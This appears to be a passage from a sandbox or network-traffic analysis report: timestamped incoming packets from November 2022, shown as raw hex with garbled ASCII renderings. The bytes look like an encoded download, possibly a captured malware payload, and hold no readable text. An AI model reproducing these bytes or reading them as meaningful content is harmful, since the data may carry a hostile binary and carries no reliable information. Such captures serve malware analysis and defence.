7f 45 17 7d 46 e8 66 83 08 c7 ba 38 15 5b 99 ae eb ac 38 Data Ascii: =EVMJC&;be[.b6:"(WIJYl7>iZU!if-){Oru\B=`>rs^Syj2FXe\|{IN9<8 ?fyZXTluLu~dA$w&3."@&"oT.>E}Ff8[8
2022-11-07 22:49:04 UTC	5304	IN	Data Raw: e7 7d ec f1 40 4a 3c 24 da 60 84 19 6f e3 9b b9 64 2e 89 e1 5a a1 06 95 46 1e 0d 76 42 61 86 31 a5 2f 46 f9 20 6b 70 14 5a b0 9c 6d 21 62 6a 25 5b bf 82 6c 6e 47 a9 21 f3 e9 90 60 37 03 fa 72 25 71 9c eb 60 c9 e5 4e 3d c3 4a 4f 34 f8 3a 7e 71 a5 82 ec 6a 75 92 2d b0 d3 84 37 0b f3 f6 ee e1 54 6c 71 6b df 9f 87 9c e7 19 0f 13 6b b8 67 91 34 e1 45 09 a9 61 7e 8e d9 05 77 3b c9 38 9f 86 ef 5a 39 fc 69 bc 42 1b 5b 4b 8e 2c 6d 9f 63 33 34 e1 25 ec f2 61 32 ea 55 81 d3 d0 6c 41 9d 3e 08 7c 01 63 53 13 56 74 bd cc 0d 18 6d 3c 71 aa b1 74 97 28 e3 0a 7a ea fb 2d 33 c7 d2 da f6 44 2a 72 e8 46 9b 07 a0 2f 7e 2e 9a 59 28 a1 43 f8 fc 78 81 65 ab c4 35 b6 7b 58 ef a6 66 68 5d b4 99 c0 38 f7 63 de 14 73 35 6e b7 55 70 25 45 7c 1a 7a 58 52 11 74 4a 31 f9 e9 90 aa 09 0e Data Ascii: }@J<$`od.ZFvBa1/F kpZm!bj%[lnG!`7r%q`N=JO4:~qju-7Tlqkkg4Ea~w;8Z9iB[K,mc34%a2UlA>\|cSVtm<qt(z-3D*rF/~.Y(Cxe5{Xfh]8cs5nUp%E\|zXRtJ1
2022-11-07 22:49:04 UTC	5320	IN	Data Raw: 00 1e 63 c4 63 38 5e 53 3a 68 d0 6a f8 8b 8e be 0f 92 b2 41 b2 27 29 45 03 b6 b7 b9 e2 6f 7c b8 b6 4c f8 b3 53 38 86 69 b4 8f 4d 55 ce 81 46 1f 74 b0 4a c3 9e 5b cc 6c a6 a2 50 3c 15 38 52 42 e9 0c d7 b0 59 86 9e 31 1f 0e c8 8a 95 12 ed 54 9d a1 fb b4 1d cf fd 99 45 e9 7f 52 2d 4a 3f 38 c3 e2 26 41 45 c8 15 96 d4 46 8b 57 95 68 9a 0f ac 3e 28 db c4 dd 67 b4 07 48 4b 94 49 cb 3a df a7 9e e3 13 35 1d 39 74 3e dc 88 89 18 b6 a0 75 0b 32 98 0b 58 3a cd 19 a5 da 9b 60 e3 96 e2 c5 c3 48 c6 1f c9 31 d5 9f c5 80 ff 5a 72 39 03 90 a8 7f cc a7 31 d5 3b 8d 06 c4 92 fc 3e 96 73 ab d4 fd f0 ac 14 6c 6b bc 0f 8e 86 68 a7 b4 f7 3d 34 d8 86 80 77 83 3b d7 4c 53 6d 14 20 b2 8a 11 c1 f4 8f 63 66 ad 58 ea e6 b5 3b 38 18 ab 5a 39 cb 34 8e b1 95 12 83 5e dc bd 67 a3 64 c3 46 Data Ascii: cc8^S:hjA')Eo\|LS8iMUFtJ[lP<8RBY1TER-J?8&AEFWh>(gHKI:59t>u2X:`H1Zr91;>slkh=4w;LSm cfX;8Z94^gdF
2022-11-07 22:49:04 UTC	5336	IN	Data Raw: 9c e8 6c b1 91 4c 08 2a 5a b5 58 f0 c2 1b 2c 02 32 4a ea a6 80 cf 9c 76 4a 29 47 f3 91 21 4e d7 c2 03 b8 f8 fe 67 ab a3 2f a4 a4 29 24 c9 fe 02 60 5c 17 d3 bd 25 5d b6 d8 bf 5d 29 e2 e4 1b 3d 55 00 e6 ad c5 18 14 30 bb f3 80 d6 f8 21 c5 ab 58 9a a4 c5 1b fb 58 e7 17 c7 ad 07 4b b6 60 8f 79 3d 7e aa 88 0f 36 d5 9e d8 6a e0 c3 2e b6 7c 6d 91 a4 42 8b 68 14 ea f2 1d fa 28 5f bf f2 fe f1 0e 01 6c 7c d2 58 4c 3c c9 62 89 f3 8c 28 00 56 e6 0f 29 ed a7 3e 6c 25 1e fa 28 c5 a6 83 5e d0 95 ed c8 eb 3d 25 d5 b5 cd 78 91 c7 53 ff 83 1f 40 02 a0 c0 cc 40 2e 9d 20 0c 8e 62 5a fc b2 e2 cb 04 d5 85 9b ba 90 02 18 fb 07 79 ec 1e 37 54 ed 60 c4 4f 3f d2 7b f5 cc 1b 05 f2 27 da 67 5a 99 9d f1 ba b8 79 ee 27 37 4a 87 e0 90 bd 90 d5 f3 65 c7 ff ed 8a f2 66 ca ba 6a 82 c5 9b Data Ascii: lL*ZX,2JvJ)G!Ng/)$`\%]])=U0!XXK`y=~6j.\|mBh(_l\|XL<b(V)>l%(^=%xS@@. bZy7T`O?{'gZy'7Jefj
2022-11-07 22:49:04 UTC	5352	IN	Data Raw: a7 11 22 f4 2a 0a bc 35 a8 bf d1 ec f7 8e aa 51 e1 bf 52 43 bf 07 64 f8 b5 8d 1e 54 06 54 8c 43 e2 1e d0 62 a6 17 36 ec 29 d6 55 76 29 eb 09 d9 58 01 8d 3c 5e aa c3 1f 54 40 62 b8 75 90 b0 cc c0 2a ca 62 f9 b6 58 ec d6 36 69 d9 47 15 49 ee 7e e4 6d cc 9c e3 be 2f 94 cb 65 0f a5 80 70 58 6b 76 7e e9 22 50 b0 27 e9 6a a4 cf 7c be aa 13 24 2b cb 13 67 fc 2c af cc d8 09 bc 19 5e 62 87 b5 e7 db f5 22 ce 52 8b fc 85 e0 0d bd a4 04 a8 4a 3f fa 00 0d fb a3 e9 c5 89 2f fa d2 38 7d aa d5 0a 50 a0 bd 45 64 1e 4a 33 ae 34 b6 1a 18 d7 a5 fb d1 05 1f c8 0a 99 24 99 1c 74 6f 64 28 5d a7 11 02 60 c4 af cb 42 7e 5b cf df e1 79 94 b0 19 a1 f0 35 08 72 a4 45 7c e6 a2 1b d5 88 30 df ea ed 78 fe a7 8b 32 51 5e 39 47 29 63 84 f4 07 24 9b a4 b4 04 a0 20 6e 7a 69 33 41 3f 40 bc Data Ascii: "5QRCdTTCb6)Uv)X<^T@bubX6iGI~m/epXkv~"P'j\|$+g,^b"RJ?/8}PEdJ34$tod(]`B~[y5rE\|0x2Q^9G)c$ nzi3A?@
2022-11-07 22:49:04 UTC	5368	IN	Data Raw: c7 31 00 37 68 ea 11 2c 52 ca 5b 7c 58 bd 50 c0 9e fa 6e c6 11 c4 5c 3f 15 c0 1a c2 0f f0 2b 5b e7 f6 a4 5d e6 b3 79 f8 7b 26 66 9b 3d fd 3d 5d c3 91 45 10 5e b1 ea d1 b2 86 f0 e0 5f 9c 84 c3 3d 15 b4 f4 86 e2 f0 40 8c 76 b1 c9 fd 87 bf 5c a5 75 dd cf f4 27 e8 3f af f9 8d da 92 0b b6 03 7d 06 01 63 8f 5b e6 ed 18 a7 69 bc 51 42 94 4c 37 20 41 b8 ec 31 4a 22 38 ec 19 36 f6 a3 44 7e 43 03 ff 3f 3a ce 0d 33 cc 50 72 81 f2 bb 3a 01 f2 34 e2 26 62 a6 3a a4 85 e3 eb 24 ea e0 db d5 42 ae 93 5d a6 44 ea 50 f8 f4 ea 51 8c 4e 82 49 3f 60 2b 36 15 c2 00 bd 1a 4f 16 ca 72 57 bb fc 97 34 e8 9b 0e 9a fa 37 9c a1 9b 4e 4c 16 28 44 ba 12 1a ed 1d 1b c2 cb 6c 36 77 c6 2d 08 6b 95 7e 28 e5 51 c7 a2 eb bc 5c 44 a0 18 00 e0 14 66 e5 50 c6 a8 ae 05 51 79 ac d3 49 b8 76 ce 59 Data Ascii: 17h,R[\|XPn\?+[]y{&f==]E^_=@v\u'?}c[iQBL7 A1J"86D~C?:3Pr:4&b:$B]DPQNI?`+6OrW47NL(Dl6w-k~(Q\DfPQyIvY
2022-11-07 22:49:04 UTC	5384	IN	Data Raw: 53 50 83 8c 80 b0 68 35 31 5f 63 6a 36 20 45 43 aa c4 77 23 30 f4 9b 7e b3 7e 3d 46 92 a1 be af 78 71 20 e2 8e ae 4a 18 4c 26 aa 48 b5 db b0 9b a5 76 91 d6 c4 15 7c f4 ea 3c 3f b8 72 ab bd 68 82 fc 2f 2a 94 6b c3 1e 76 13 1a a0 1e 31 9a 60 e3 e9 e1 5c a2 f7 dd 1c b2 b0 99 4e 94 29 b3 18 88 65 aa e0 20 75 5f 2c 17 75 cd a3 46 bd 60 d7 42 f6 de 7c 18 aa ca a9 78 33 b5 d7 9b 6d 58 73 a7 98 86 0d 3f b9 aa 05 84 e5 c4 d1 43 be 12 62 77 11 d5 e3 28 37 35 c1 4b 37 94 9d e7 c9 05 53 72 23 b6 86 84 5c 48 ba 4b d0 5b 86 c1 96 bb 81 11 bc 8a 3f c5 e7 b9 0c 96 3c 19 97 59 bb 83 a7 7f 11 98 62 2b 63 30 61 d5 dd 27 ac c9 47 a7 58 41 e1 d7 62 cf e6 01 ed 9d c0 d2 eb 18 59 26 22 d8 f6 b2 83 e4 a0 23 97 86 11 8b c3 9f b6 c8 80 36 79 79 26 11 68 4a 22 cf 39 5e 79 94 c1 9b Data Ascii: SPh51_cj6 ECw#0~~=Fxq JL&Hv\|<?rh/*kv1`\N)e u_,uF`B\|x3mXs?Cbw(75K7Sr#\HK[?<Yb+c0a'GXAbY&"#6yy&hJ"9^y
2022-11-07 22:49:04 UTC	5400	IN	Data Raw: 84 1d a8 52 22 86 45 5a 02 5c 06 54 e3 ee b9 36 34 d3 d8 fd 30 43 5f 68 f0 95 3c 73 2c d0 6a 2c 6d 72 37 19 c1 15 7d c7 53 71 e9 e5 7e 26 b7 34 97 57 b9 ac 83 1b 44 0f 44 c0 05 cf ab d1 ca 06 a9 67 b0 32 cb 45 7c 7c 6e 73 f6 31 0e 94 e9 3e 48 6b 60 45 93 9b 41 36 fa ca a8 ef 34 a3 a0 af b9 64 d1 b3 ad ae 60 8f df e7 46 88 f7 60 3f e2 65 12 3e 12 67 f0 9a d6 78 69 30 c2 ad e1 60 92 0b f0 0e 5a 68 15 78 e7 20 e1 c5 20 1e c8 7e 6c 83 e3 56 79 18 4a d3 7d 8f 11 3e 83 a3 58 4d 79 61 a7 d6 b0 d1 6c ec 77 38 8b cf c5 de 4f b9 f0 10 a4 0d 11 96 bd 03 2a a1 ac 0c a0 5a 18 ab 63 2b 9e 3d af 35 48 22 de 95 9a da b8 72 81 83 ef 86 db 8c f4 1b bc 44 fa 11 14 e4 c3 cd cc 05 fc 15 14 92 cc 8a bc 82 38 0c d4 39 1a 31 ce c6 9d ab 66 b8 7f 0a 53 7b f8 41 79 3a 57 a5 71 76 Data Ascii: R"EZ\T640C_h<s,j,mr7}Sq~&4WDDg2E\|\|ns1>Hk`EA64d`F`?e>gxi0`Zhx ~lVyJ}>XMyalw8O*Zc+=5H"rD891fS{Ay:Wqv
2022-11-07 22:49:04 UTC	5416	IN	Data Raw: 0a ea 3d 7f 90 d1 7d 45 e8 0e 62 54 18 90 0e f3 d4 78 87 7c ec ed 1e f2 da d7 46 c9 fe 61 74 23 91 6c 7c d2 8e 5c ac 6f cf 9d 6a ee 45 9f 04 5d b8 ad 9e 56 e3 e3 0a b2 9c f2 16 28 5b a6 aa d5 ca de 4c e5 7c 5e f8 83 44 00 49 a8 9d 64 60 95 8f f0 53 63 0d 38 6a 5a 20 12 e1 b3 80 bc 70 65 ec 89 05 22 a1 dc b1 f3 5f 30 1f f1 df 5d 91 88 8c ee 28 93 75 65 cd e9 83 74 77 b8 55 39 3e d7 b1 00 a1 95 52 38 58 a0 c9 79 c4 d9 29 55 72 8b c6 75 2c 14 d4 d0 af 04 7e a7 de 52 ed bc 6c 6d 70 82 1c 62 8d 74 31 15 94 78 e4 7a 87 56 66 21 2a 04 5d e6 9f b8 8d 6b 5d 6d 82 7b 3e c8 9b 98 f7 68 a2 c6 6b 87 f4 b2 72 f2 df 21 ed da 7d ef 43 f4 36 da 23 4c d8 d7 bb 45 e1 85 d9 41 d4 90 b2 aa a8 d7 67 0d e9 19 6f c3 a0 8c be 71 a7 ad 83 09 c0 5d 80 54 9a a0 9b 72 59 38 17 3e 4e Data Ascii: =}EbTx\|Fat#l\|\ojE]V([L\|^DId`Sc8jZ pe"_0](uetwU9>R8Xy)Uru,~Rlmpbt1xzVf!*]k]m{>hkr!}C6#LEAgoq]TrY8>N
2022-11-07 22:49:04 UTC	5432	IN	Data Raw: 0b 53 19 0b 0c 41 1a 55 58 53 09 0f 08 01 1f 16 0b 01 26 00 1e 14 03 02 1a 44 5b 46 4d 51 54 55 6b 63 58 58 5d 0e 1f 17 1f 1e 06 02 1f 21 1d 16 16 01 19 11 15 47 1c 08 06 0a 10 18 0d 5c 54 5a 48 59 56 48 4f 5f 4e 44 14 12 09 0b 5b 4a 34 0a 39 05 00 09 05 04 0b 19 1d 16 17 59 02 11 06 49 49 57 75 72 41 4f 50 10 08 06 17 1a 2f 06 1f 1c 58 0d 1d 09 02 14 57 4f 01 0b 17 4d 10 02 1e 0e 0b 08 0b 55 0c 06 0f 16 15 00 0b 08 12 45 1a 1c 15 4f 11 16 01 49 1c 5f 56 47 74 7d 43 41 56 4b 5a 1a 1d 1b 14 1d 05 10 03 4d 69 64 46 48 59 53 58 55 4c 17 09 16 1f 08 07 0d 1c 13 33 13 1f 1d 0f 05 1d 1f 04 1c 4c 1c 17 1f 0a 1d 5b 4a 0c 01 16 4f 03 06 04 02 07 0c 07 54 14 1e 00 13 19 18 09 0f 0c 55 02 00 01 5e 1b 00 09 40 10 5b 5b 4d 75 7f 50 45 4c 47 4a 4d 54 59 45 05 06 10 03 Data Ascii: SAUXS&D[FMQTUkcXX]!G\TZHYVHO_ND[J49YIIWurAOP/XWOMUEOI_VGt}CAVKZMidFHYSXUL3L[JOTU^@[[MuPELGJMTYE
2022-11-07 22:49:04 UTC	5448	IN	Data Raw: 49 1d 6b 30 e2 ac 6d 2d 43 ae 16 53 69 df 7d 2d 1e f6 88 39 19 80 26 e4 94 31 f4 0b 47 41 cf 2a 66 69 78 30 e8 9d 9f 2c d1 3b ed 87 8e 9c a9 72 78 44 b0 2d e5 8e 0c e4 30 24 79 3f e0 a2 77 83 3f 95 87 87 28 56 b1 17 b9 3b e5 aa 5e 6a 79 73 23 2b 2f 38 2d 3b 2b 30 b7 76 66 37 63 20 22 3e 31 3f 2b 30 e0 83 8c 64 7a 73 2c e3 ca 4c b9 73 78 75 39 ec a0 2f e7 d1 50 c9 79 77 63 29 ff c7 42 d9 78 78 61 27 e9 ad 75 f7 5b 6c 66 68 91 f9 a8 74 70 2d e1 7b 6a 25 fd a7 31 a6 9d 29 ff df 42 f9 78 78 61 27 ef 9f 74 7c e3 50 64 68 79 3b f3 f9 54 d5 6c 67 6a 25 fd 89 31 f4 9d 60 79 ef 7f 6b 78 78 29 ea 9a 6b ff 93 65 6e 66 2d 48 b3 30 fc f4 41 d4 67 6a 6d 12 3d f0 73 22 29 fb 66 45 73 7b 78 89 5b bc 65 7a 36 55 ae 57 ba 31 fa 81 3d f9 21 48 47 26 e0 79 73 63 74 63 89 1d Data Ascii: Ik0m-CSi}-9&1GA*fix0,;rxD-0$y?w?(V;^jys#+/8-;+0vf7c ">1?+0dzs,Lsxu9/Pywc)Bxxa'u[lfhtp-{j%1)Bxxa't\|Pdhy;Tlgj%1`ykxx)kenf-H0Agjm=s")fEs{x[ez6UW1=!HG&ysctc
2022-11-07 22:49:04 UTC	5464	IN	Data Raw: 2f e0 b9 91 bf 93 93 9b 75 6c 20 6e 66 eb 81 17 77 f0 f3 65 6c 67 ea 16 75 0d 0c 0a e3 1a 74 6b 13 1e 34 f1 80 87 ff 80 85 8c 2c e7 a5 21 f2 37 5c 6d f0 5d 25 68 ef 4a 8b 86 86 3f e0 a1 77 27 ef 88 31 f1 25 4b 74 8c cb 77 64 6e 2f e1 a1 c9 7c 75 70 65 20 ee 8b 24 fd b8 91 09 ab 9e 89 23 ef aa 91 83 9f 90 93 02 75 6c 20 6e 66 21 f2 37 5c 6d f0 5d 33 68 ef be 89 86 86 3f e0 a1 77 d1 23 69 78 78 2d e6 8d 2d f3 37 40 76 8e d4 79 73 78 3c f9 a4 85 a7 97 92 8b fa 81 07 17 27 3a e2 87 81 ff 81 9e 90 24 ed b9 9a d0 90 99 97 76 c5 78 f8 20 f8 ec 9d 6b 1b 7f fa 91 05 5f 60 79 ec 3c 97 87 87 2d e6 8d 8c 7b a5 9b 91 2e e1 bf 9a 26 8b 8f 9a 20 ee 8b 85 45 99 86 88 2b e8 b0 82 28 97 87 87 e1 14 6d 10 0f c7 e4 15 64 68 76 f7 56 8a 8f 9a 87 cf 65 72 f4 79 79 77 63 2d ff Data Ascii: /ul nfwelgutk4,!7\m]%hJ?w'1%Ktwdn/\|upe $#ul nf!7\m]3h?w#ixx--7@vysx<':$vx k_`y<-{.& E+(mdhvVeryywc-
2022-11-07 22:49:04 UTC	5480	IN	Data Raw: 66 28 87 ec 45 7f 6d 64 7a cb 65 6e 66 68 48 a1 39 f6 f4 41 2c 66 6a 6d 75 92 d8 11 f3 29 fb 76 9f c1 7a 78 29 e4 ed 64 7b 73 64 d0 46 68 79 73 30 f8 0b 6f 87 55 65 72 f4 79 79 77 63 29 ff a9 2e ea b8 79 28 e6 e8 40 7a 72 64 6e 27 e0 4d 67 39 fd c4 41 64 66 6a 6d 3c 40 a6 78 e7 f8 88 94 99 66 ce 4b 29 ec af 65 32 4e 9b 6e 66 68 0c be c2 8a 70 65 6c 2a e1 e9 50 61 78 77 63 2d ff 8a 27 af fc 5c 9e 6f 6c 64 7a 32 9b fa 42 78 78 73 78 cd 71 65 6c 67 5b bf 35 fa fd 53 23 60 76 6b 67 82 d9 1e 4f 60 73 e0 7a 73 64 6e 66 e8 c0 7b 79 75 70 4d 63 e2 b9 6f 74 79 35 fc 20 71 cc 7a 66 69 78 34 e8 8e 24 e9 67 28 cc 6c 66 20 f4 08 7b cb 4a 65 6c 67 82 7f 8e 86 86 3e e8 e5 52 6b 67 69 78 93 52 60 73 e0 7a 73 64 6e 66 20 f0 b1 30 f6 b0 64 24 e4 a9 6c 3d f0 fd 53 63 60 76 Data Ascii: f(EmdzenfhH9A,fjmu)vzx)d{sdFhys0oUeryywc).y(@zrdn'Mg9Adfjm<@xfK)e2Nnfhpel*Paxwc-'\oldz2Bxxsxqelg[5S#`vkgO`szsdnf{yupMcoty5 qzfix4$g(lf {Jelg>RkgixR`szsdnf 0d$l=Sc`v
2022-11-07 22:49:04 UTC	5496	IN	Data Raw: 9e 6a 0e 31 2c ea 88 10 2e c8 65 6e 66 68 f0 ad 39 f2 44 41 e9 91 1f 38 35 f2 2d 53 67 e4 a4 1e 6a 58 b8 30 e2 ab 44 3f 24 2c 25 32 a5 97 6c c9 44 76 70 24 e5 23 4e 79 45 b9 31 f4 a7 49 2d 35 39 28 24 bb 07 60 73 e0 7a 73 64 6e 66 24 f0 91 90 6d 8f 9a 93 2e e3 a9 39 fc 9d 02 cf d9 7a 6b 66 69 30 fb a5 47 37 3a 25 32 38 ad f6 29 f2 37 5c 71 f5 a5 19 20 23 ee 08 5d 71 77 17 16 cd 69 66 69 78 f1 b9 2e eb 60 5e f6 a4 1a ed 21 f2 3f 5c 7d ca 9a 93 98 95 85 45 16 79 77 e6 a1 02 88 5b 6b 79 78 61 d5 e6 64 7a 73 dc 78 66 68 79 7c 3c b7 38 e6 a8 4f 31 33 2b 38 25 b4 f3 20 fd 17 42 7d 87 6d 44 53 6f 64 43 b4 11 c4 ef b0 89 32 77 c4 44 41 d4 43 6a 6d 74 38 fa 0b 47 65 74 64 e3 57 87 87 9e 2e ef 20 5e 63 65 87 57 97 86 8c 77 6a 34 65 6c 56 a3 28 45 b0 3c 46 a3 50 a4 Data Ascii: j1,.enfh9DA85-SgjX0D?$,%2lDvp$#NyE1I-59($`szsdnf$m.9zkfi0G7:%28)7\q #]qwifix.`^!?\}Eyw[kyxadzsxfhy\|<8O13+8% B}mDSodC2wDACjmt8GetdW. ^ceWwj4elV(E<FP
2022-11-07 22:49:04 UTC	5512	IN	Data Raw: ef 45 4a 30 e4 af 18 5a 32 f0 1c 56 66 1c 34 3b f3 3d 48 8d 69 58 6a 6d 45 b9 31 f4 a7 51 2d 35 39 34 39 24 20 32 2d 3a b9 3b e1 ae 69 ec f6 76 78 75 38 e6 14 77 6a 62 f0 f9 7b 77 63 29 fd 3b 76 80 fa 7a 61 6f 84 46 51 73 64 27 ef a8 31 f8 7e 3c f3 1d 54 67 65 e8 3b 7b 79 77 2b ec 7b 51 61 6b 78 30 e8 27 54 8f d0 3b e9 7b 33 83 7b 73 30 fc 20 75 85 52 95 92 8b 76 66 37 63 29 f3 ab 69 ed 7d 7d 61 6f 24 e7 02 63 64 61 f3 aa fd a1 77 f1 ff 64 6c 67 22 e8 b4 76 fd 66 66 61 76 23 ed 39 68 30 ea 7d 26 a3 7e 41 65 6e 66 68 90 71 87 8a 8f 03 42 68 75 e9 74 79 79 77 63 29 fb 76 8b 83 7a 78 e0 52 8f 8e 78 73 64 6e 76 68 31 fa 20 35 7f e0 a1 9c 95 92 3c fa 01 4f 63 6e f2 d6 62 69 78 30 ea 27 54 8c 4b 4d 64 6e de 64 79 73 78 9c 54 9a 93 98 65 72 f4 79 79 77 63 d9 60 Data Ascii: EJ0Z2Vf4;=HiXjmE1Q-5949$ 2-:;ivxu8wjb{wc);vzaoFQsd'1~<Tge;{yw+{Qakx0'T;{3{s0 uRvf7c)i}}ao$cdawdlg"vffav#9h0}&~AenfhqBhutyywc)vzxRxsdnvh1 5<Ocnbix0'TKMdndysxTeryywc`
2022-11-07 22:49:04 UTC	5528	IN	Data Raw: 3b 28 26 bb 07 60 73 e0 7a 73 64 6e 66 21 f2 6f 5c 39 fd 16 74 2b e3 9c 9c a9 06 88 9c 20 ff ae e3 a9 0d 41 29 e2 17 44 32 fa 9d 86 db 17 86 8c 39 fc b5 e0 ac 12 2c e6 37 71 fc b7 16 7b fd 38 76 e2 3b 74 e4 bd 12 68 53 a3 a3 2d 76 68 79 73 78 fc 33 69 e9 a7 15 58 84 fa 3a 7f 62 25 ff 81 2a e0 99 30 e2 ab 24 3f 24 2c 25 32 27 35 38 2d 91 3d 83 9a 93 68 75 e9 74 79 79 77 63 2d ff 9a 8e e1 fa 87 9e 84 ba 02 75 6c 20 6e 66 9f a1 3b f1 29 54 4d 20 ea 19 45 fd 3a 69 3f ee 64 2d 9f 99 96 30 f1 25 4b 4c 8c bb bd 9b 91 2e e3 79 3b f1 31 54 55 63 c9 9a 85 c5 b7 86 88 2b ec 22 4f 46 21 f1 68 6e c1 9c 8f 71 7c 7b 2e 66 e3 2a 63 fd a7 09 5c 24 ee 90 21 fd 88 91 b9 73 61 76 e2 a0 ec b8 0c 89 87 ef aa 85 8c 2c e5 32 4c 49 32 f1 80 38 ec 7c 2f e1 21 50 51 86 23 47 41 9f Data Ascii: ;(&`szsdnf!o\9t+ A)D29,7q{8v;thS-vhysx3iX:b%0$?$,%2'58-=hutyywc-ul nf;)TM E:i?d-0%KL.y;1TUc+"OF!hnq\|{.fc\$!sav,2LI28\|/!PQ#GA
2022-11-07 22:49:04 UTC	5544	IN	Data Raw: 99 e2 3c 5c 19 26 e7 70 5e 3a e7 aa 6e c0 7d 7c fd f6 8e 9a 93 2f e3 39 50 49 a4 33 47 51 3e e6 32 4d 08 30 e8 84 24 e9 36 57 24 b5 1a 4c 39 9b 71 87 8f 9a 85 c6 90 92 8b f2 3d 53 1b 28 fd 7f 42 20 fb bc 69 c7 68 6b ff f0 9a 91 99 20 f0 27 5c 45 ad 21 48 57 22 e0 20 5d 09 3f ea 8a 3e e6 2a 4d 38 a3 1d 4b 2c 8c bb 81 9b 91 8f 01 83 8c 87 3d fd 31 48 17 d3 48 74 79 79 3f ea 8a 9e 21 b8 96 87 91 33 95 93 9b 3f f6 92 61 e3 d4 87 8c 87 39 fd 29 48 07 26 e4 20 5d 41 f6 2f 45 0e 6b 76 69 78 34 e8 23 48 54 bd 37 40 0e 66 68 79 73 90 8d 20 65 6c 2b e1 21 50 49 31 fa 2f 45 28 2a de 79 78 78 61 27 e7 34 72 9b 3b 3d 66 68 35 f8 2c 51 48 24 d7 64 6a 6d 74 fc b9 09 6e 6e c1 3f 42 37 1e f1 f5 4b fc 64 7a 73 ed ea 42 e4 79 73 78 7a c6 23 6d 2f e3 83 9d d1 83 88 9c 2c f3 Data Ascii: <\&p^:n}\|/9PI3GQ>2M0$6W$L9q=S(B ihk '\E!HW" ]?>M8K,=1HHtyy?!3?a9)H& ]A/Ekvix4#HT7@fhys el+!PI1/E(yxxa'4r;=fh5,QH$djmtnn?B7KdzsBysxz#m/,
2022-11-07 22:49:04 UTC	5560	IN	Data Raw: 56 80 f8 89 9e 90 e9 a4 04 40 28 e7 9f d2 78 73 78 75 98 73 67 67 6a 21 fd 93 31 fe a2 28 ff ac 8e 71 74 78 61 ea ac 6b f4 bf 65 6e 66 eb 82 4a 0c 47 b7 21 48 33 4a 6d 74 79 f4 28 52 20 f5 14 72 68 77 f6 e0 6e 6c 64 32 f8 20 4a 46 25 f0 93 bf 31 54 21 7c 67 6a 6d 3d f0 95 3f ee 11 77 82 76 97 87 87 29 e4 28 40 5a 3b e9 1e 67 20 f2 37 5c 55 3d ec 8c 2f e1 21 50 21 31 fe 94 28 ff 87 dc 50 78 78 61 a9 6c 5d 93 c7 9f 91 99 e3 fd 57 f4 75 70 65 e5 3b 4e 1d fd 3d 5d 3b 8a fe 85 94 99 21 f3 24 45 37 24 ed 06 57 3c 87 96 9b 86 8c 1e 7a 5e a3 e1 12 6b 25 ff 25 5d 2f 2b e8 32 4f 3e e0 0c 5c 29 60 e6 b9 86 8c 9b 08 69 47 bf 7c fd a6 8c 9a 93 a0 2e 49 30 79 79 77 63 88 b0 98 99 96 30 f3 3d 4b 34 2c f3 b2 8d e8 96 97 86 81 77 2d b0 6a da 37 95 0b 7b 56 bb 78 e4 d6 76 Data Ascii: V@(xsxusggj!1(qtxakenfJG!H3Jmty(R rhwnld2 JF%1T!\|gjm=?wv)(@Z;g 7\U=/!P!1(Pxxal]Wupe;N=];!$E7$W<z^k%%]/+2O>\)`iG\|.I0yywc0=K4,w-j7{Vxv
2022-11-07 22:49:04 UTC	5576	IN	Data Raw: 8e e1 a9 87 9e ea ac 11 5a 3b 4d 9d de 97 86 8c 07 3d f1 9e 93 98 95 12 0b 76 31 f6 98 61 76 6b e6 d1 78 78 61 ef 63 29 b9 3b e7 aa 4e 33 27 b0 e8 e5 e0 f5 fc f7 fa fd e4 e9 e9 e7 f3 20 22 3e 31 3f 2b 30 e2 83 4c 2c f1 5a 2c e5 3b 80 31 fa af 38 f9 a9 24 5e b0 1a 14 31 50 a4 2f e8 bf 27 5f aa 31 77 26 b7 84 be aa 8c 9b 26 5f b0 30 fa a0 3d f9 a3 20 68 2c ad 39 fc b9 03 72 29 fb 27 5b 69 34 f1 83 87 6f b5 85 8c e1 ae 13 48 31 5a 8b cd 8f 9a 93 18 22 ec 8f 86 86 88 1c 1e 79 23 e7 92 78 78 61 ef d4 64 7a 73 e4 61 2b ab 31 f0 bc 55 2b 3b 33 3a 2b 31 b7 30 f0 a7 2a e8 af 23 eb 7c fe 44 60 6f 24 e9 77 83 5f 6f 66 80 82 b8 78 75 e0 f5 fc f7 fa fd e4 e9 e9 e7 f3 37 25 23 e5 85 50 30 ea 66 24 ef 0e 57 04 26 ed 31 91 3b 41 af 07 2a 24 4e b9 21 4d ba 30 78 24 b9 3f Data Ascii: Z;M=v1avkxxac);N3' ">1?+0L,Z,;18$^1P/'_1w&&_0= h,9r)'[i4oH1Z"y#xxadzsa+1U+;3:+10#\|D`o$w_ofxu7%#P0f$W&1;A$N!M0x$?
2022-11-07 22:49:05 UTC	5592	IN	Data Raw: 30 28 2d 39 35 3a 3b 32 29 3b e7 82 5e 20 f2 72 30 fe 18 8d 20 ee a4 20 f9 45 69 3f ea b6 3e e0 36 99 34 51 a7 27 e5 af 37 fa a9 26 67 86 35 5a 85 3d 49 b3 1b 75 e1 2d 8c fc b9 78 ed fd 76 6b 66 21 f3 79 29 e4 3c 94 36 fe 20 4a 49 20 f0 82 90 8d 9a 9a 93 2e e3 ab 38 f4 19 6f 2b e4 89 1f 7a 21 f3 6b 2d e2 0c 7c 32 f0 9b 6f 69 ec d2 73 78 75 39 ec 94 2b e3 8c 9c 71 e8 88 9c 29 f3 86 13 52 30 f3 6a d7 93 9b 85 8c 94 61 a7 29 81 f6 b8 0b 0a 29 e5 44 2b aa 30 5d 81 77 63 61 76 22 ef 1d 5c 90 20 a9 68 50 7a 3b e7 aa 5e 33 27 2c 25 34 2c 24 31 26 34 2c 2b ba 76 68 63 2b fb 27 49 71 34 7b 5a 23 6d 95 32 f0 99 6f 12 0f 30 fa 90 39 f9 9f 84 cb fa 92 8b 92 de 11 f3 2d fd 4a 2e ec 95 0c d0 22 55 a5 0e df 28 6f a9 23 f4 67 44 3c fd 69 50 2f e9 90 75 0d 33 3e ea 89 9e Data Ascii: 0(-95:;2);^ r0 Ei?>64Q'7&g5Z=Iu-xvkf!y)<6 JI .8o+z!k-\|2oisxu9+q)R0ja))D+0]wcav"\ hPz;^3',%4,$1&4,+vhc+'Iq4{Z#m2o09-J."U(o#gD<iP/u3>
